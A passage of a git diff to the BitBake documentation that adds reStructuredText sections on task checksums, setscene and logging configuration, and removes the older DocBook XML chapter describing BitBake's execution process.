+Another problem results from the "run" scripts containing functions that
+might or might not get called. The incremental build solution contains
+code that figures out dependencies between shell functions. This code is
+used to prune the "run" scripts down to the minimum set, thereby
+alleviating this problem and making the "run" scripts much more readable
+as a bonus.
+
+So far we have solutions for shell scripts. What about Python tasks? The
+same approach applies even though these tasks are more difficult. The
+process needs to figure out what variables a Python function accesses
+and what functions it calls. Again, the incremental build solution
+contains code that first figures out the variable and function
+dependencies, and then creates a checksum for the data used as the input
+to the task.
+
+Like the working directory case, situations exist where dependencies
+should be ignored. For these cases, you can instruct the build process
+to ignore a dependency by using a line like the following: ::
+
+ PACKAGE_ARCHS[vardepsexclude] = "MACHINE"
+
+This example ensures that the
+``PACKAGE_ARCHS`` variable does not depend on the value of ``MACHINE``,
+even if it does reference it.
+
+Equally, there are cases where we need to add dependencies BitBake is
+not able to find. You can accomplish this by using a line like the
+following: ::
+
+ PACKAGE_ARCHS[vardeps] = "MACHINE"
+
+This example explicitly
+adds the ``MACHINE`` variable as a dependency for ``PACKAGE_ARCHS``.
+
+Consider a case with in-line Python, for example, where BitBake is not
+able to figure out dependencies. When running in debug mode (i.e. using
+``-DDD``), BitBake produces output when it discovers something for which
+it cannot figure out dependencies.
+
+Thus far, this section has limited discussion to the direct inputs into
+a task. Information based on direct inputs is referred to as the
+"basehash" in the code. However, there is still the question of a task's
+indirect inputs - the things that were already built and present in the
+build directory. The checksum (or signature) for a particular task needs
+to add the hashes of all the tasks on which the particular task depends.
+Choosing which dependencies to add is a policy decision. However, the
+effect is to generate a master checksum that combines the basehash and
+the hashes of the task's dependencies.
+
+At the code level, there are a variety of ways both the basehash and the
+dependent task hashes can be influenced. Within the BitBake
+configuration file, we can give BitBake some extra information to help
+it construct the basehash. The following statement effectively results
+in a list of global variable dependency excludes - variables never
+included in any checksum. This example uses variables from OpenEmbedded
+to help illustrate the concept: ::
+
+ BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH DL_DIR \
+ SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
+ USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \
+ PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \
+ CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_DISABLE LICENSE_PATH SDKPKGSUFFIX"
+
+The previous example excludes the work directory, which is part of
+``TMPDIR``.
+
+The rules for deciding which hashes of dependent tasks to include
+through dependency chains are more complex and are generally
+accomplished with a Python function. The code in
+``meta/lib/oe/sstatesig.py`` shows two examples of this and also
+illustrates how you can insert your own policy into the system if so
+desired. This file defines the two basic signature generators
+OpenEmbedded-Core uses: "OEBasic" and "OEBasicHash". By default, there
+is a dummy "noop" signature handler enabled in BitBake. This means that
+behavior is unchanged from previous versions. ``OE-Core`` uses the
+"OEBasicHash" signature handler by default through this setting in the
+``bitbake.conf`` file: ::
+
+ BB_SIGNATURE_HANDLER ?= "OEBasicHash"
+
+The "OEBasicHash" ``BB_SIGNATURE_HANDLER`` is the same as the "OEBasic"
+version but adds the task hash to the stamp files. This results in any
+metadata change that changes the task hash, automatically causing the
+task to be run again. This removes the need to bump
+:term:`PR` values, and changes to metadata automatically
+ripple across the build.
+
+It is also worth noting that the end result of these signature
+generators is to make some dependency and hash information available to
+the build. This information includes:
+
+- ``BB_BASEHASH_task-``\ *taskname*: The base hashes for each task in the
+ recipe.
+
+- ``BB_BASEHASH_``\ *filename:taskname*: The base hashes for each
+ dependent task.
+
+- ``BBHASHDEPS_``\ *filename:taskname*: The task dependencies for
+ each task.
+
+- ``BB_TASKHASH``: The hash of the currently running task.
+
+It is worth noting that BitBake's "-S" option lets you debug BitBake's
+processing of signatures. The options passed to -S allow different
+debugging modes to be used, either using BitBake's own debug functions
+or possibly those defined in the metadata/signature handler itself. The
+simplest parameter to pass is "none", which causes a set of signature
+information to be written out into ``STAMPS_DIR`` corresponding to the
+targets specified. The other currently available parameter is
+"printdiff", which causes BitBake to try to establish the closest
+signature match it can (e.g. in the sstate cache) and then run
+``bitbake-diffsigs`` over the matches to determine the stamps and delta
+where these two stamp trees diverge.
+
+.. note::
+
+ It is likely that future versions of BitBake will provide other
+ signature handlers triggered through additional "-S" parameters.
+
+You can find more information on checksum metadata in the
+:ref:`bitbake-user-manual/bitbake-user-manual-metadata:task checksums and setscene`
+section.
+
+Setscene
+========
+
+The setscene process enables BitBake to handle "pre-built" artifacts.
+The ability to handle and reuse these artifacts allows BitBake the
+luxury of not having to build something from scratch every time.
+Instead, BitBake can use, when possible, existing build artifacts.
+
+BitBake needs to have reliable data indicating whether or not an
+artifact is compatible. Signatures, described in the previous section,
+provide an ideal way of representing whether an artifact is compatible.
+If a signature is the same, an object can be reused.
+
+If an object can be reused, the problem then becomes how to replace a
+given task or set of tasks with the pre-built artifact. BitBake solves
+the problem with the "setscene" process.
+
+When BitBake is asked to build a given target, before building anything,
+it first asks whether cached information is available for any of the
+targets it's building, or any of the intermediate targets. If cached
+information is available, BitBake uses this information instead of
+running the main tasks.
+
+BitBake first calls the function defined by the
+:term:`BB_HASHCHECK_FUNCTION` variable
+with a list of tasks and corresponding hashes it wants to build. This
+function is designed to be fast and returns a list of the tasks for
+which it believes in can obtain artifacts.
+
+Next, for each of the tasks that were returned as possibilities, BitBake
+executes a setscene version of the task that the possible artifact
+covers. Setscene versions of a task have the string "_setscene" appended
+to the task name. So, for example, the task with the name ``xxx`` has a
+setscene task named ``xxx_setscene``. The setscene version of the task
+executes and provides the necessary artifacts returning either success
+or failure.
+
+As previously mentioned, an artifact can cover more than one task. For
+example, it is pointless to obtain a compiler if you already have the
+compiled binary. To handle this, BitBake calls the
+:term:`BB_SETSCENE_DEPVALID` function for
+each successful setscene task to know whether or not it needs to obtain
+the dependencies of that task.
+
+Finally, after all the setscene tasks have executed, BitBake calls the
+function listed in
+:term:`BB_SETSCENE_VERIFY_FUNCTION2`
+with the list of tasks BitBake thinks has been "covered". The metadata
+can then ensure that this list is correct and can inform BitBake that it
+wants specific tasks to be run regardless of the setscene result.
+
+You can find more information on setscene metadata in the
+:ref:`bitbake-user-manual/bitbake-user-manual-metadata:task checksums and setscene`
+section.
+
+Logging
+=======
+
+In addition to the standard command line option to control how verbose
+builds are when execute, bitbake also supports user defined
+configuration of the `Python
+logging <https://docs.python.org/3/library/logging.html>`__ facilities
+through the :term:`BB_LOGCONFIG` variable. This
+variable defines a json or yaml `logging
+configuration <https://docs.python.org/3/library/logging.config.html>`__
+that will be intelligently merged into the default configuration. The
+logging configuration is merged using the following rules:
+
+- The user defined configuration will completely replace the default
+ configuration if top level key ``bitbake_merge`` is set to the value
+ ``False``. In this case, all other rules are ignored.
+
+- The user configuration must have a top level ``version`` which must
+ match the value of the default configuration.
+
+- Any keys defined in the ``handlers``, ``formatters``, or ``filters``,
+ will be merged into the same section in the default configuration,
+ with the user specified keys taking replacing a default one if there
+ is a conflict. In practice, this means that if both the default
+ configuration and user configuration specify a handler named
+ ``myhandler``, the user defined one will replace the default. To
+ prevent the user from inadvertently replacing a default handler,
+ formatter, or filter, all of the default ones are named with a prefix
+ of "``BitBake.``"
+
+- If a logger is defined by the user with the key ``bitbake_merge`` set
+ to ``False``, that logger will be completely replaced by user
+ configuration. In this case, no other rules will apply to that
+ logger.
+
+- All user defined ``filter`` and ``handlers`` properties for a given
+ logger will be merged with corresponding properties from the default
+ logger. For example, if the user configuration adds a filter called
+ ``myFilter`` to the ``BitBake.SigGen``, and the default configuration
+ adds a filter called ``BitBake.defaultFilter``, both filters will be
+ applied to the logger
+
+As an example, consider the following user logging configuration file
+which logs all Hash Equivalence related messages of VERBOSE or higher to
+a file called ``hashequiv.log`` ::
+
+ {
+ "version": 1,
+ "handlers": {
+ "autobuilderlog": {
+ "class": "logging.FileHandler",
+ "formatter": "logfileFormatter",
+ "level": "DEBUG",
+ "filename": "hashequiv.log",
+ "mode": "w"
+ }
+ },
+ "formatters": {
+ "logfileFormatter": {
+ "format": "%(name)s: %(levelname)s: %(message)s"
+ }
+ },
+ "loggers": {
+ "BitBake.SigGen.HashEquiv": {
+ "level": "VERBOSE",
+ "handlers": ["autobuilderlog"]
+ },
+ "BitBake.RunQueue.HashEquiv": {
+ "level": "VERBOSE",
+ "handlers": ["autobuilderlog"]
+ }
+ }
+ }
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.xml
deleted file mode 100644
index e4251dff56..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.xml
+++ /dev/null
@@ -1,1029 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<chapter id="bitbake-user-manual-execution">
- <title>Execution</title>
-
- <para>
- The primary purpose for running BitBake is to produce some kind
- of output such as a single installable package, a kernel, a software
- development kit, or even a full, board-specific bootable Linux image,
- complete with bootloader, kernel, and root filesystem.
- Of course, you can execute the <filename>bitbake</filename>
- command with options that cause it to execute single tasks,
- compile single recipe files, capture or clear data, or simply
- return information about the execution environment.
- </para>
-
- <para>
- This chapter describes BitBake's execution process from start
- to finish when you use it to create an image.
- The execution process is launched using the following command
- form:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>target</replaceable>
- </literallayout>
- For information on the BitBake command and its options,
- see
- "<link linkend='bitbake-user-manual-command'>The BitBake Command</link>"
- section.
- <note>
- <para>
- Prior to executing BitBake, you should take advantage of available
- parallel thread execution on your build host by setting the
- <link linkend='var-bb-BB_NUMBER_THREADS'><filename>BB_NUMBER_THREADS</filename></link>
- variable in your project's <filename>local.conf</filename>
- configuration file.
- </para>
-
- <para>
- A common method to determine this value for your build host is to run
- the following:
- <literallayout class='monospaced'>
- $ grep processor /proc/cpuinfo
- </literallayout>
- This command returns the number of processors, which takes into
- account hyper-threading.
- Thus, a quad-core build host with hyper-threading most likely
- shows eight processors, which is the value you would then assign to
- <filename>BB_NUMBER_THREADS</filename>.
- </para>
-
- <para>
- A possibly simpler solution is that some Linux distributions
- (e.g. Debian and Ubuntu) provide the <filename>ncpus</filename> command.
- </para>
- </note>
- </para>
-
- <section id='parsing-the-base-configuration-metadata'>
- <title>Parsing the Base Configuration Metadata</title>
-
- <para>
- The first thing BitBake does is parse base configuration
- metadata.
- Base configuration metadata consists of your project's
- <filename>bblayers.conf</filename> file to determine what
- layers BitBake needs to recognize, all necessary
- <filename>layer.conf</filename> files (one from each layer),
- and <filename>bitbake.conf</filename>.
- The data itself is of various types:
- <itemizedlist>
- <listitem><para><emphasis>Recipes:</emphasis>
- Details about particular pieces of software.
- </para></listitem>
- <listitem><para><emphasis>Class Data:</emphasis>
- An abstraction of common build information
- (e.g. how to build a Linux kernel).
- </para></listitem>
- <listitem><para><emphasis>Configuration Data:</emphasis>
- Machine-specific settings, policy decisions,
- and so forth.
- Configuration data acts as the glue to bind everything
- together.</para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The <filename>layer.conf</filename> files are used to
- construct key variables such as
- <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>
- and
- <link linkend='var-bb-BBFILES'><filename>BBFILES</filename></link>.
- <filename>BBPATH</filename> is used to search for
- configuration and class files under the
- <filename>conf</filename> and <filename>classes</filename>
- directories, respectively.
- <filename>BBFILES</filename> is used to locate both recipe
- and recipe append files
- (<filename>.bb</filename> and <filename>.bbappend</filename>).
- If there is no <filename>bblayers.conf</filename> file,
- it is assumed the user has set the <filename>BBPATH</filename>
- and <filename>BBFILES</filename> directly in the environment.
- </para>
-
- <para>
- Next, the <filename>bitbake.conf</filename> file is located
- using the <filename>BBPATH</filename> variable that was
- just constructed.
- The <filename>bitbake.conf</filename> file may also include other
- configuration files using the
- <filename>include</filename> or
- <filename>require</filename> directives.
- </para>
-
- <para>
- Prior to parsing configuration files, BitBake looks
- at certain variables, including:
- <itemizedlist>
- <listitem><para>
- <link linkend='var-bb-BB_ENV_WHITELIST'><filename>BB_ENV_WHITELIST</filename></link>
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-BB_ENV_EXTRAWHITE'><filename>BB_ENV_EXTRAWHITE</filename></link>
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-BB_PRESERVE_ENV'><filename>BB_PRESERVE_ENV</filename></link>
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-BB_ORIGENV'><filename>BB_ORIGENV</filename></link>
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-BITBAKE_UI'><filename>BITBAKE_UI</filename></link>
- </para></listitem>
- </itemizedlist>
- The first four variables in this list relate to how BitBake treats shell
- environment variables during task execution.
- By default, BitBake cleans the environment variables and provides tight
- control over the shell execution environment.
- However, through the use of these first four variables, you can
- apply your control regarding the
- environment variables allowed to be used by BitBake in the shell
- during execution of tasks.
- See the
- "<link linkend='passing-information-into-the-build-task-environment'>Passing Information Into the Build Task Environment</link>"
- section and the information about these variables in the
- variable glossary for more information on how they work and
- on how to use them.
- </para>
-
- <para>
- The base configuration metadata is global
- and therefore affects all recipes and tasks that are executed.
- </para>
-
- <para>
- BitBake first searches the current working directory for an
- optional <filename>conf/bblayers.conf</filename> configuration file.
- This file is expected to contain a
- <link linkend='var-bb-BBLAYERS'><filename>BBLAYERS</filename></link>
- variable that is a space-delimited list of 'layer' directories.
- Recall that if BitBake cannot find a <filename>bblayers.conf</filename>
- file, then it is assumed the user has set the <filename>BBPATH</filename>
- and <filename>BBFILES</filename> variables directly in the environment.
- </para>
-
- <para>
- For each directory (layer) in this list, a <filename>conf/layer.conf</filename>
- file is located and parsed with the
- <link linkend='var-bb-LAYERDIR'><filename>LAYERDIR</filename></link>
- variable being set to the directory where the layer was found.
- The idea is these files automatically set up
- <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>
- and other variables correctly for a given build directory.
- </para>
-
- <para>
- BitBake then expects to find the <filename>conf/bitbake.conf</filename>
- file somewhere in the user-specified <filename>BBPATH</filename>.
- That configuration file generally has include directives to pull
- in any other metadata such as files specific to the architecture,
- the machine, the local environment, and so forth.
- </para>
-
- <para>
- Only variable definitions and include directives are allowed
- in BitBake <filename>.conf</filename> files.
- Some variables directly influence BitBake's behavior.
- These variables might have been set from the environment
- depending on the environment variables previously
- mentioned or set in the configuration files.
- The
- "<link linkend='ref-bb-variables-glos'>Variables Glossary</link>"
- chapter presents a full list of variables.
- </para>
-
- <para>
- After parsing configuration files, BitBake uses its rudimentary
- inheritance mechanism, which is through class files, to inherit
- some standard classes.
- BitBake parses a class when the inherit directive responsible
- for getting that class is encountered.
- </para>
-
- <para>
- The <filename>base.bbclass</filename> file is always included.
- Other classes that are specified in the configuration using the
- <link linkend='var-bb-INHERIT'><filename>INHERIT</filename></link>
- variable are also included.
- BitBake searches for class files in a
- <filename>classes</filename> subdirectory under
- the paths in <filename>BBPATH</filename> in the same way as
- configuration files.
- </para>
-
- <para>
- A good way to get an idea of the configuration files and
- the class files used in your execution environment is to
- run the following BitBake command:
- <literallayout class='monospaced'>
- $ bitbake -e > mybb.log
- </literallayout>
- Examining the top of the <filename>mybb.log</filename>
- shows you the many configuration files and class files
- used in your execution environment.
- </para>
-
- <note>
- <para>
- You need to be aware of how BitBake parses curly braces.
- If a recipe uses a closing curly brace within the function and
- the character has no leading spaces, BitBake produces a parsing
- error.
- If you use a pair of curly braces in a shell function, the
- closing curly brace must not be located at the start of the line
- without leading spaces.
- </para>
-
- <para>
- Here is an example that causes BitBake to produce a parsing
- error:
- <literallayout class='monospaced'>
- fakeroot create_shar() {
- cat &lt;&lt; "EOF" &gt; ${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.sh
- usage()
- {
- echo "test"
- ###### The following "}" at the start of the line causes a parsing error ######
- }
- EOF
- }
- </literallayout>
- Writing the recipe this way avoids the error:
- <literallayout class='monospaced'>
- fakeroot create_shar() {
- cat &lt;&lt; "EOF" &gt; ${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.sh
- usage()
- {
- echo "test"
- ######The following "}" with a leading space at the start of the line avoids the error ######
- }
- EOF
- }
- </literallayout>
- </para>
- </note>
- </section>
-
- <section id='locating-and-parsing-recipes'>
- <title>Locating and Parsing Recipes</title>
-
- <para>
- During the configuration phase, BitBake will have set
- <link linkend='var-bb-BBFILES'><filename>BBFILES</filename></link>.
- BitBake now uses it to construct a list of recipes to parse,
- along with any append files (<filename>.bbappend</filename>)
- to apply.
- <filename>BBFILES</filename> is a space-separated list of
- available files and supports wildcards.
- An example would be:
- <literallayout class='monospaced'>
- BBFILES = "/path/to/bbfiles/*.bb /path/to/appends/*.bbappend"
- </literallayout>
- BitBake parses each recipe and append file located
- with <filename>BBFILES</filename> and stores the values of
- various variables into the datastore.
- <note>
- Append files are applied in the order they are encountered in
- <filename>BBFILES</filename>.
- </note>
- For each file, a fresh copy of the base configuration is
- made, then the recipe is parsed line by line.
- Any inherit statements cause BitBake to find and
- then parse class files (<filename>.bbclass</filename>)
- using
- <link linkend='var-bb-BBPATH'><filename>BBPATH</filename></link>
- as the search path.
- Finally, BitBake parses in order any append files found in
- <filename>BBFILES</filename>.
- </para>
-
- <para>
- One common convention is to use the recipe filename to define
- pieces of metadata.
- For example, in <filename>bitbake.conf</filename> the recipe
- name and version are used to set the variables
- <link linkend='var-bb-PN'><filename>PN</filename></link> and
- <link linkend='var-bb-PV'><filename>PV</filename></link>:
- <literallayout class='monospaced'>
- PN = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
- PV = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[1] or '1.0'}"
- </literallayout>
- In this example, a recipe called "something_1.2.3.bb" would set
- <filename>PN</filename> to "something" and
- <filename>PV</filename> to "1.2.3".
- </para>
-
- <para>
- By the time parsing is complete for a recipe, BitBake
- has a list of tasks that the recipe defines and a set of
- data consisting of keys and values as well as
- dependency information about the tasks.
- </para>
-
- <para>
- BitBake does not need all of this information.
- It only needs a small subset of the information to make
- decisions about the recipe.
- Consequently, BitBake caches the values in which it is
- interested and does not store the rest of the information.
- Experience has shown it is faster to re-parse the metadata than to
- try and write it out to the disk and then reload it.
- </para>
-
- <para>
- Where possible, subsequent BitBake commands reuse this cache of
- recipe information.
- The validity of this cache is determined by first computing a
- checksum of the base configuration data (see
- <link linkend='var-bb-BB_HASHCONFIG_WHITELIST'><filename>BB_HASHCONFIG_WHITELIST</filename></link>)
- and then checking if the checksum matches.
- If that checksum matches what is in the cache and the recipe
- and class files have not changed, BitBake is able to use
- the cache.
- BitBake then reloads the cached information about the recipe
- instead of reparsing it from scratch.
- </para>
-
- <para>
- Recipe file collections exist to allow the user to
- have multiple repositories of
- <filename>.bb</filename> files that contain the same
- exact package.
- For example, one could easily use them to make one's
- own local copy of an upstream repository, but with
- custom modifications that one does not want upstream.
- Here is an example:
- <literallayout class='monospaced'>
- BBFILES = "/stuff/openembedded/*/*.bb /stuff/openembedded.modified/*/*.bb"
- BBFILE_COLLECTIONS = "upstream local"
- BBFILE_PATTERN_upstream = "^/stuff/openembedded/"
- BBFILE_PATTERN_local = "^/stuff/openembedded.modified/"
- BBFILE_PRIORITY_upstream = "5"
- BBFILE_PRIORITY_local = "10"
- </literallayout>
- <note>
- The layers mechanism is now the preferred method of collecting
- code.
- While the collections code remains, its main use is to set layer
- priorities and to deal with overlap (conflicts) between layers.
- </note>
- </para>
- </section>
-
- <section id='bb-bitbake-providers'>
- <title>Providers</title>
-
- <para>
- Assuming BitBake has been instructed to execute a target
- and that all the recipe files have been parsed, BitBake
- starts to figure out how to build the target.
- BitBake looks through the <filename>PROVIDES</filename> list
- for each of the recipes.
- A <filename>PROVIDES</filename> list is the list of names by which
- the recipe can be known.
- Each recipe's <filename>PROVIDES</filename> list is created
- implicitly through the recipe's
- <link linkend='var-bb-PN'><filename>PN</filename></link> variable
- and explicitly through the recipe's
- <link linkend='var-bb-PROVIDES'><filename>PROVIDES</filename></link>
- variable, which is optional.
- </para>
-
- <para>
- When a recipe uses <filename>PROVIDES</filename>, that recipe's
- functionality can be found under an alternative name or names other
- than the implicit <filename>PN</filename> name.
- As an example, suppose a recipe named <filename>keyboard_1.0.bb</filename>
- contained the following:
- <literallayout class='monospaced'>
- PROVIDES += "fullkeyboard"
- </literallayout>
- The <filename>PROVIDES</filename> list for this recipe becomes
- "keyboard", which is implicit, and "fullkeyboard", which is explicit.
- Consequently, the functionality found in
- <filename>keyboard_1.0.bb</filename> can be found under two
- different names.
- </para>
- </section>
-
- <section id='bb-bitbake-preferences'>
- <title>Preferences</title>
-
- <para>
- The <filename>PROVIDES</filename> list is only part of the solution
- for figuring out a target's recipes.
- Because targets might have multiple providers, BitBake needs
- to prioritize providers by determining provider preferences.
- </para>
-
- <para>
- A common example in which a target has multiple providers
- is "virtual/kernel", which is on the
- <filename>PROVIDES</filename> list for each kernel recipe.
- Each machine often selects the best kernel provider by using a
- line similar to the following in the machine configuration file:
- <literallayout class='monospaced'>
- PREFERRED_PROVIDER_virtual/kernel = "linux-yocto"
- </literallayout>
- The default
- <link linkend='var-bb-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></link>
- is the provider with the same name as the target.
- BitBake iterates through each target it needs to build and
- resolves them and their dependencies using this process.
- </para>
-
- <para>
- Understanding how providers are chosen is made complicated by the fact
- that multiple versions might exist for a given provider.
- BitBake defaults to the highest version of a provider.
- Version comparisons are made using the same method as Debian.
- You can use the
- <link linkend='var-bb-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></link>
- variable to specify a particular version.
- You can influence the order by using the
- <link linkend='var-bb-DEFAULT_PREFERENCE'><filename>DEFAULT_PREFERENCE</filename></link>
- variable.
- </para>
-
- <para>
- By default, files have a preference of "0".
- Setting <filename>DEFAULT_PREFERENCE</filename> to "-1" makes the
- recipe unlikely to be used unless it is explicitly referenced.
- Setting <filename>DEFAULT_PREFERENCE</filename> to "1" makes it
- likely the recipe is used.
- <filename>PREFERRED_VERSION</filename> overrides any
- <filename>DEFAULT_PREFERENCE</filename> setting.
- <filename>DEFAULT_PREFERENCE</filename> is often used to mark newer
- and more experimental recipe versions until they have undergone
- sufficient testing to be considered stable.
- </para>
-
- <para>
- When there are multiple “versions†of a given recipe,
- BitBake defaults to selecting the most recent
- version, unless otherwise specified.
- If the recipe in question has a
- <link linkend='var-bb-DEFAULT_PREFERENCE'><filename>DEFAULT_PREFERENCE</filename></link>
- set lower than the other recipes (default is 0), then
- it will not be selected.
- This allows the person or persons maintaining
- the repository of recipe files to specify
- their preference for the default selected version.
- Additionally, the user can specify their preferred version.
- </para>
-
- <para>
- If the first recipe is named <filename>a_1.1.bb</filename>, then the
- <link linkend='var-bb-PN'><filename>PN</filename></link> variable
- will be set to “aâ€, and the
- <link linkend='var-bb-PV'><filename>PV</filename></link>
- variable will be set to 1.1.
- </para>
-
- <para>
- Thus, if a recipe named <filename>a_1.2.bb</filename> exists, BitBake
- will choose 1.2 by default.
- However, if you define the following variable in a
- <filename>.conf</filename> file that BitBake parses, you
- can change that preference:
- <literallayout class='monospaced'>
- PREFERRED_VERSION_a = "1.1"
- </literallayout>
- </para>
-
- <note>
- <para>
- It is common for a recipe to provide two versions -- a stable,
- numbered (and preferred) version, and a version that is
- automatically checked out from a source code repository that
- is considered more "bleeding edge" but can be selected only
- explicitly.
- </para>
-
- <para>
- For example, in the OpenEmbedded codebase, there is a standard,
- versioned recipe file for BusyBox,
- <filename>busybox_1.22.1.bb</filename>,
- but there is also a Git-based version,
- <filename>busybox_git.bb</filename>, which explicitly contains the line
- <literallayout class='monospaced'>
- DEFAULT_PREFERENCE = "-1"
- </literallayout>
- to ensure that the numbered, stable version is always preferred
- unless the developer selects otherwise.
- </para>
- </note>
- </section>
-
- <section id='bb-bitbake-dependencies'>
- <title>Dependencies</title>
-
- <para>
- Each target BitBake builds consists of multiple tasks such as
- <filename>fetch</filename>, <filename>unpack</filename>,
- <filename>patch</filename>, <filename>configure</filename>,
- and <filename>compile</filename>.
- For best performance on multi-core systems, BitBake considers each
- task as an independent
- entity with its own set of dependencies.
- </para>
-
- <para>
- Dependencies are defined through several variables.
- You can find information about variables BitBake uses in
- the <link linkend='ref-bb-variables-glos'>Variables Glossary</link>
- near the end of this manual.
- At a basic level, it is sufficient to know that BitBake uses the
- <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link> and
- <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link> variables when
- calculating dependencies.
- </para>
-
- <para>
- For more information on how BitBake handles dependencies, see the
- "<link linkend='dependencies'>Dependencies</link>" section.
- </para>
- </section>
-
- <section id='ref-bitbake-tasklist'>
- <title>The Task List</title>
-
- <para>
- Based on the generated list of providers and the dependency information,
- BitBake can now calculate exactly what tasks it needs to run and in what
- order it needs to run them.
- The
- "<link linkend='executing-tasks'>Executing Tasks</link>" section has more
- information on how BitBake chooses which task to execute next.
- </para>
-
- <para>
- The build now starts with BitBake forking off threads up to the limit set in the
- <link linkend='var-bb-BB_NUMBER_THREADS'><filename>BB_NUMBER_THREADS</filename></link>
- variable.
- BitBake continues to fork threads as long as there are tasks ready to run,
- those tasks have all their dependencies met, and the thread threshold has not been
- exceeded.
- </para>
-
- <para>
- It is worth noting that you can greatly speed up the build time by properly setting
- the <filename>BB_NUMBER_THREADS</filename> variable.
- </para>
-
- <para>
- As each task completes, a timestamp is written to the directory specified by the
- <link linkend='var-bb-STAMP'><filename>STAMP</filename></link> variable.
- On subsequent runs, BitBake looks in the build directory within
- <filename>tmp/stamps</filename> and does not rerun
- tasks that are already completed unless a timestamp is found to be invalid.
- Currently, invalid timestamps are only considered on a per
- recipe file basis.
- So, for example, if the configure stamp has a timestamp greater than the
- compile timestamp for a given target, then the compile task would rerun.
- Running the compile task again, however, has no effect on other providers
- that depend on that target.
- </para>
-
- <para>
- The exact format of the stamps is partly configurable.
- In modern versions of BitBake, a hash is appended to the
- stamp so that if the configuration changes, the stamp becomes
- invalid and the task is automatically rerun.
- This hash, or signature used, is governed by the signature policy
- that is configured (see the
- "<link linkend='checksums'>Checksums (Signatures)</link>"
- section for information).
- It is also possible to append extra metadata to the stamp using
- the <filename>[stamp-extra-info]</filename> task flag.
- For example, OpenEmbedded uses this flag to make some tasks machine-specific.
- </para>
-
- <note>
- Some tasks are marked as "nostamp" tasks.
- No timestamp file is created when these tasks are run.
- Consequently, "nostamp" tasks are always rerun.
- </note>
-
- <para>
- For more information on tasks, see the
- "<link linkend='tasks'>Tasks</link>" section.
- </para>
- </section>
-
- <section id='executing-tasks'>
- <title>Executing Tasks</title>
-
- <para>
- Tasks can be either a shell task or a Python task.
- For shell tasks, BitBake writes a shell script to
- <filename>${</filename><link linkend='var-bb-T'><filename>T</filename></link><filename>}/run.do_taskname.<replaceable>pid</replaceable></filename>
- and then executes the script.
- The generated shell script contains all the exported variables,
- and the shell functions with all variables expanded.
- Output from the shell script goes to the file
- <filename>${T}/log.do_taskname.<replaceable>pid</replaceable></filename>.
- Looking at the expanded shell functions in the run file and
- the output in the log files is a useful debugging technique.
- </para>
-
- <para>
- For Python tasks, BitBake executes the task internally and logs
- information to the controlling terminal.
- Future versions of BitBake will write the functions to files
- similar to the way shell tasks are handled.
- Logging will be handled in a way similar to shell tasks as well.
- </para>
-
- <para>
- The order in which BitBake runs the tasks is controlled by its
- task scheduler.
- It is possible to configure the scheduler and define custom
- implementations for specific use cases.
- For more information, see these variables that control the
- behavior:
- <itemizedlist>
- <listitem><para>
- <link linkend='var-bb-BB_SCHEDULER'><filename>BB_SCHEDULER</filename></link>
- </para></listitem>
- <listitem><para>
- <link linkend='var-bb-BB_SCHEDULERS'><filename>BB_SCHEDULERS</filename></link>
- </para></listitem>
- </itemizedlist>
- It is possible to have functions run before and after a task's main
- function.
- This is done using the <filename>[prefuncs]</filename>
- and <filename>[postfuncs]</filename> flags of the task
- that lists the functions to run.
- </para>
- </section>
-
- <section id='checksums'>
- <title>Checksums (Signatures)</title>
-
- <para>
- A checksum is a unique signature of a task's inputs.
- The signature of a task can be used to determine if a task
- needs to be run.
- Because it is a change in a task's inputs that triggers running
- the task, BitBake needs to detect all the inputs to a given task.
- For shell tasks, this turns out to be fairly easy because
- BitBake generates a "run" shell script for each task and
- it is possible to create a checksum that gives you a good idea of when
- the task's data changes.
- </para>
-
- <para>
- To complicate the problem, some things should not be included in
- the checksum.
- First, there is the actual specific build path of a given task -
- the working directory.
- It does not matter if the working directory changes because it should not
- affect the output for target packages.
- The simplistic approach for excluding the working directory is to set
- it to some fixed value and create the checksum for the "run" script.
- BitBake goes one step better and uses the
- <link linkend='var-bb-BB_HASHBASE_WHITELIST'><filename>BB_HASHBASE_WHITELIST</filename></link>
- variable to define a list of variables that should never be included
- when generating the signatures.
- </para>
-
- <para>
- Another problem results from the "run" scripts containing functions that
- might or might not get called.
- The incremental build solution contains code that figures out dependencies
- between shell functions.
- This code is used to prune the "run" scripts down to the minimum set,
- thereby alleviating this problem and making the "run" scripts much more
- readable as a bonus.
- </para>
-
- <para>
- So far we have solutions for shell scripts.
- What about Python tasks?
- The same approach applies even though these tasks are more difficult.
- The process needs to figure out what variables a Python function accesses
- and what functions it calls.
- Again, the incremental build solution contains code that first figures out
- the variable and function dependencies, and then creates a checksum for the data
- used as the input to the task.
- </para>
-
- <para>
- Like the working directory case, situations exist where dependencies
- should be ignored.
- For these cases, you can instruct the build process to ignore a dependency
- by using a line like the following:
- <literallayout class='monospaced'>
